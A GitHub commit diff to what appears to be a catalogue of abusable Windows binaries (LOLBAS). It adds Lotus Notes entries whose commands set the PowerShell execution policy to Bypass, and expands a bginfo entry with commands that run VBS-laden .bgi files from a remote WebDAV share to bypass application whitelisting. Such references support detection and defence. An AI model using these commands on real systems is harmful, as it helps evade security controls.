Merge branch 'master' into master

master
giMini 2018-05-19 13:37:57 -04:00 committed by GitHub
commit 388b6a64ac
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
6 changed files with 96 additions and 6 deletions

View File

@ -92,6 +92,8 @@ If you are missing from the acknowledgement, please let me know (I did not forge
# OTHER NON MICROSOFT BINARIES
[Gpup.exe](OtherBinaries/Gpup.md)
[Nlnotes.exe](OtherBinaries/Nlnotes.md)
[Notes.exe](OtherBinaries/Notes.md)
[Nvuhda6.exe](OtherBinaries/Nvuhda6.md)
[Nvudisp.exe](OtherBinaries/Nvudisp.md)
[VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md)

View File

@ -8,12 +8,14 @@ rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.IN
Acknowledgements:
* Pierre-Alexandre Braeken - @pabraeken
* Matt harr0ey - @harr0ey
Code sample:
*
Resources:
* https://twitter.com/pabraeken/status/994392481927258113
* https://twitter.com/harr0ey/status/975350238184697857
Full path:
```

31
OtherBinaries/Nlnotes.md Normal file
View File

@ -0,0 +1,31 @@
## Nlnotes.exe
* Functions: Execute
```
NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
```
Acknowledgements:
* Daniel Bohannon - @danielhbohannon
Code sample:
*
Resources:
* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
* https://twitter.com/HanseSecure/status/995578436059127808
Full path:
```
?
```
Notes:
Used by Lotus Notes
Detection:

31
OtherBinaries/Notes.md Normal file
View File

@ -0,0 +1,31 @@
## Notes.exe
* Functions: Execute
```
Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
```
Acknowledgements:
* Daniel Bohannon - @danielhbohannon
Code sample:
*
Resources:
* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
* https://twitter.com/HanseSecure/status/995578436059127808
Full path:
```
C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
```
Notes:
Used by Lotus Notes
Detection:

View File

@ -3,11 +3,35 @@
* Functions: Execute
```
bginfo.exe bginfo.bgi /popup /nolicprompt
(Add vbs code inside .bgi file)
bginfo.exe bginfo.bgi /popup /nolicprompt
"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt
"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
```
Acknowledgements:
* Oddvar Moe - @oddvarmoe
Code sample:
* https://github.com/api0cradle/BGInfo/blob/master/BGITool_1.0.ps1
Resources:
* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
* https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/
* https://twitter.com/Oddvarmoe/status/865330067630694400
* https://twitter.com/ItsReallyNick/status/996133093613424641
* https://github.com/3gstudent/bgi-creater
* https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/
Full path:
```
No fixed path
```
Notes:
Used to set background image in Windows with details about the environment
Detection:
Bginfo.exe requesting files externally or running VBS scripts.

View File

@ -34,7 +34,7 @@ Also, please be patient if it takes some time for your contribution to be added
Every binary, script and library has it's own .md file in the subfolders. That way I should be easier to maintain and reuse.
I have borrowed examples from the community (And a lot from Red Canary - Atomic Red Team - Thanks @subtee)
Would really love if the community could contribute as much as possible. That would make it better for everyone.
If you think it is hard to make a pull request using github, don't hasitate to send me a tweet and I will add the contribution for you.
If you think it is hard to make a pull request using github, don't hesitate to send me a tweet and I will add the contribution for you.
## STORY
@ -78,4 +78,4 @@ Love this logo:
- [ ] Map it to the Mitre Att&ck <3
- [ ] LOLGuiBins
- [ ] More list based on classifications
- [ ] LOLBAS lists for Linux? OSX?
- [ ] LOLBAS lists for Linux? OSX?